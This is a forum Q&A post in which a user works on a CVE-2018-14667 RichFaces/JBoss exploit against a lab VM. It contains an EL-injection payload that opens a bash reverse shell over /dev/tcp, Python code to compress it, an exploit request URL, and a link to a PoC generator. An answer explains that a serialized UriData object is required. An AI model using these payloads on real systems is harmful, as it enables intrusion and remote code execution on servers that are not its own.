Menu
I am currently running on a virtual machine JBoss 5.1.0GA + RichFaces 3.X + photoalbum demo which makes me vulnerable (only accessible from my LAN) to CVE-2018-14667. I have tested the payload mentioned in https://seclists.org/fulldisclosure/2018/Nov/47 and it works fine. Now, I am trying to figure out how I could generate my own payload in order to obtain a reverse shell.
Here's the information I found so far for generating my own payload;
this needs to be compressed via zlib:
#{request.getClass().getClassLoader().loadClass(\"java.lang.Runtime\").getMethod(\"getRuntime\").invoke(null).exec(\"bash -i > /dev/tcp/192.168.2.37/1091 0>&1 2>&1\")}
How to compress with zlib:
import zlib
import binascii
data = '#{request.getClass().getClassLoader().loadClass(\"java.lang.Runtime\").getMethod(\"getRuntime\").invoke(null).exec(\"bash -i > /dev/tcp/192.168.2.37/1091 0>&1 2>&1\")}'
compressed_data = zlib.compress(data, 2)
print('Original data: ' + data)
print('Compressed data: ' + binascii.hexlify(compressed_data))
Then after, encode the compressed data with base64url on:
https://simplycalc.com/base64url-encode.php
Then test it out like this:
http://192.168.2.37:8181/photoalbum/a4j/s/3_3_3.Finalorg.ajax4jsf.resource.UserResource/n/n/DATA/Nzg1ZTQ1OGFjZDBhMDIyMTE0NDY1ZjQ1MGM0MjE3NWQ0NzgzNmEzNmIzNjk1YjliZGVjMGM2Y2I4YzhkNjk4ZDNmMDRkMWJiMjcwNWI1ZjkzODljZjMyZDllMzNkZTMzYzYwNDAzYTZiZGQzMzEzMmZlYzM0M2QwMDZlNzJhNWM4NTZmYTQxNzVkMzQzOGVkMDczODY1OWZlYzE1ZTllNzdmYzQzNDA2YzM2OGM1YmZiN2JlODQwOTk5Y2ZjZTcxYzAwN2Y2OGM5ZTc1MWNjOWNhOTI4ZTA4ODM0NWE0ZmUyNjY0YWI0MDZlNzZhMDYwYmQxNWIyNjkyNTY5YmFhNTI0YWEwZWU1YWYzN2MzYzEzMzg1
Unfortunately, every time I get a HTTP status code 500 saying:
javax.faces.FacesException: Error decode resource data
I have been trying to figure this out all night but without success so I decided to ask here maybe I could find a solution to my current issue.
Any help would be very appreciated.
Thanks
--- UPDATES ---
You can find a PoC generator written in Java here:
https://pastebin.com/raw/YRKdatWv
1) Name it Main.java 2) javac Main.java
Unfortunately, I didn't had luck on my side;
Main.java:1: error: package com.sun.facelets.el does not exist
import com.sun.facelets.el.TagMethodExpression;
^
Main.java:2: error: package com.sun.facelets.el does not exist
import com.sun.facelets.el.TagValueExpression;
^
Main.java:3: error: package com.sun.facelets.tag does not exist
import com.sun.facelets.tag.Location;
^
Main.java:4: error: package com.sun.facelets.tag does not exist
import com.sun.facelets.tag.TagAttribute;
^
Main.java:5: error: package org.ajax4jsf.resource does not exist
import org.ajax4jsf.resource.UserResource;
^
Main.java:6: error: package org.ajax4jsf.util.base64 does not exist
import org.ajax4jsf.util.base64.URL64Codec;
^
Main.java:7: error: package org.jboss.el does not exist
import org.jboss.el.MethodExpressionImpl;
^
Main.java:8: error: package org.jboss.el does not exist
import org.jboss.el.ValueExpressionImpl;
^
Main.java:9: error: package org.jboss.el.parser does not exist
import org.jboss.el.parser.*;
^
Main.java:10: error: package org.jboss.seam.core does not exist
import org.jboss.seam.core.Expressions;
^
Main.java:11: error: package org.richfaces.ui.application does not exist
import org.richfaces.ui.application.StateMethodExpressionWrapper;
^
Main.java:21: error: package javax.el does not exist
import javax.el.MethodExpression;
^
Main.java:22: error: package javax.faces.context does not exist
import javax.faces.context.FacesContext;
^
Main.java:43: error: cannot find symbol
MethodExpressionImpl mei = new MethodExpressionImpl(pocEL, null, null, null, null, new Class[]{OutputStream.class, Object.class});
^
symbol: class MethodExpressionImpl
location: class Main
Main.java:43: error: cannot find symbol
MethodExpressionImpl mei = new MethodExpressionImpl(pocEL, null, null, null, null, new Class[]{OutputStream.class, Object.class});
^
symbol: class MethodExpressionImpl
location: class Main
Main.java:44: error: cannot find symbol
ValueExpressionImpl vei = new ValueExpressionImpl(pocEL, null, null, null, MethodExpression.class);
^
symbol: class ValueExpressionImpl
location: class Main
Main.java:44: error: cannot find symbol
ValueExpressionImpl vei = new ValueExpressionImpl(pocEL, null, null, null, MethodExpression.class);
^
symbol: class ValueExpressionImpl
location: class Main
Main.java:44: error: cannot find symbol
ValueExpressionImpl vei = new ValueExpressionImpl(pocEL, null, null, null, MethodExpression.class);
^
symbol: class MethodExpression
location: class Main
Main.java:45: error: cannot find symbol
StateMethodExpressionWrapper smew = new StateMethodExpressionWrapper(mei, vei);
^
symbol: class StateMethodExpressionWrapper
location: class Main
Main.java:45: error: cannot find symbol
StateMethodExpressionWrapper smew = new StateMethodExpressionWrapper(mei, vei);
^
symbol: class StateMethodExpressionWrapper
location: class Main
Main.java:46: error: cannot find symbol
Location location = new Location("/richfaces/mediaOutput/examples/jpegSample.xhtml", 0, 0);
^
symbol: class Location
location: class Main
Main.java:46: error: cannot find symbol
Location location = new Location("/richfaces/mediaOutput/examples/jpegSample.xhtml", 0, 0);
^
symbol: class Location
location: class Main
Main.java:47: error: cannot find symbol
TagAttribute tagAttribute = new TagAttribute(location, "", "", "@11214", "createContent="+pocEL);
^
symbol: class TagAttribute
location: class Main
Main.java:47: error: cannot find symbol
TagAttribute tagAttribute = new TagAttribute(location, "", "", "@11214", "createContent="+pocEL);
^
symbol: class TagAttribute
location: class Main
Main.java:48: error: cannot find symbol
TagMethodExpression tagMethodExpression = new TagMethodExpression(tagAttribute, smew);
^
symbol: class TagMethodExpression
location: class Main
Main.java:48: error: cannot find symbol
TagMethodExpression tagMethodExpression = new TagMethodExpression(tagAttribute, smew);
^
symbol: class TagMethodExpression
location: class Main
Main.java:51: error: cannot find symbol
Constructor ct = cls.getDeclaredConstructor(FacesContext.class, Object.class);
^
symbol: class FacesContext
location: class Main
Main.java:59: error: cannot find symbol
TagAttribute tag = new TagAttribute(location, "", "", "just", "modified="+pocEL);
^
symbol: class TagAttribute
location: class Main
Main.java:59: error: cannot find symbol
TagAttribute tag = new TagAttribute(location, "", "", "just", "modified="+pocEL);
^
symbol: class TagAttribute
location: class Main
Main.java:60: error: cannot find symbol
ValueExpressionImpl ve = new ValueExpressionImpl(pocEL+" modified", null, null, null, Date.class);
^
symbol: class ValueExpressionImpl
location: class Main
Main.java:60: error: cannot find symbol
ValueExpressionImpl ve = new ValueExpressionImpl(pocEL+" modified", null, null, null, Date.class);
^
symbol: class ValueExpressionImpl
location: class Main
Main.java:61: error: cannot find symbol
TagValueExpression tagValueExpression = new TagValueExpression(tag, ve);
^
symbol: class TagValueExpression
location: class Main
Main.java:61: error: cannot find symbol
TagValueExpression tagValueExpression = new TagValueExpression(tag, ve);
^
symbol: class TagValueExpression
location: class Main
Main.java:65: error: cannot find symbol
TagAttribute tag2 = new TagAttribute(location, "", "", "have_fun", "expires="+pocEL);
^
symbol: class TagAttribute
location: class Main
Main.java:65: error: cannot find symbol
TagAttribute tag2 = new TagAttribute(location, "", "", "have_fun", "expires="+pocEL);
^
symbol: class TagAttribute
location: class Main
Main.java:66: error: cannot find symbol
ValueExpressionImpl ve2 = new ValueExpressionImpl(pocEL+" expires", null, null, null, Date.class);
^
symbol: class ValueExpressionImpl
location: class Main
Main.java:66: error: cannot find symbol
ValueExpressionImpl ve2 = new ValueExpressionImpl(pocEL+" expires", null, null, null, Date.class);
^
symbol: class ValueExpressionImpl
location: class Main
Main.java:67: error: cannot find symbol
TagValueExpression tagValueExpression2 = new TagValueExpression(tag2, ve2);
^
symbol: class TagValueExpression
location: class Main
Main.java:67: error: cannot find symbol
TagValueExpression tagValueExpression2 = new TagValueExpression(tag2, ve2);
^
symbol: class TagValueExpression
location: class Main
Main.java:71: error: package UserResource does not exist
UserResource.UriData uriData = new UserResource.UriData();
^
Main.java:71: error: package UserResource does not exist
UserResource.UriData uriData = new UserResource.UriData();
^
Main.java:103: error: cannot find symbol
byte[] dataArray = URL64Codec.encodeBase64(zipsrc);
^
symbol: variable URL64Codec
location: class Main
42 errors
361
You need to compile and execute the POC generator with org.ajax4jsf:ajax4jsf, org.jboss.el:jboss-el, org.jboss.seam:jboss-seam, org.richfaces:ui, com.sun.facelets:jsf-facelets and probably some transitive dependencies on the classpath.
Your snippet is not working because its not just the Base64 encoded EL expression that should be in the payload. Instead, you should serialize a specially constructed UriData instance that contains the EL expression using an ObjectOutputStream. More information about Java object serialization can be found at the Javadoc for Serializable.
It will be hard if not impossible for you to mimic this particular Java sterilization in Python. You could try using javaobj-py3 for this. I am not going to write the actual code for it, its no exercise to me :)
188
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With
